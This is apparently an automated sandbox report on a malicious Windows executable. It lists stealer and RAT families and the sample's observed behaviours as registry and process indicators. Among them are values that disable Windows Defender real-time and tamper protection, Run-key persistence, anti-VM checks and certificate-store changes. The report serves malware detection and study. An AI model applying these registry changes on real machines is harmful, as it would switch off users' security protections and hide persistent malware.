Analysis Overview
SHA256
3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e
Threat Level: Known bad
The file 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe was found to be: Known bad.
Malicious Activity Summary
Gcleaner family
Stealc
TA505
GCleaner
Amadey family
Suspicious use of NtCreateUserProcessOtherParentProcess
Ta505 family
Orcus family
Stealc family
Lumma Stealer, LummaC
Amadey
Modifies Windows Defender Real-time Protection settings
Lumma family
Orcus
Orcurs Rat Executable
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Identifies Wine through registry keys
Checks computer location settings
Windows security modification
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Checks BIOS information in registry
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Adds Run key to start application
Checks installed software on the system
AutoIT Executable
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
System Location Discovery: System Language Discovery
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of SendNotifyMessage
Runs net.exe
Checks processor information in registry
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies system certificate store
Kills process with taskkill
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-06 02:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-06 02:26
Reported
2024-12-06 02:29
Platform
win7-20240903-en
Max time kernel
140s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
GCleaner
Gcleaner family
Lumma Stealer, LummaC
Lumma family
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
Orcus
Orcus family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2072 created 1144 | N/A | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | C:\Windows\Explorer.EXE |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012582001\85e2bf0e38.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\smartscreen.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
Loads dropped DLL
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\e5129ccc98.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\e5129ccc98.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\b207a1ce92.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\b207a1ce92.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\85e2bf0e38.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\85e2bf0e38.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\f672d1755a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\f672d1755a.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" | C:\Users\Admin\AppData\Local\Temp\smartscreen.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| File opened for modification | C:\Windows\MovieArchives | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| File opened for modification | C:\Windows\PackageExpression | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012583001\f672d1755a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\1012582001\85e2bf0e38.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012582001\85e2bf0e38.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012579001\3e485e96e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012581001\b207a1ce92.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\1012582001\85e2bf0e38.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1012580001\e5129ccc98.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
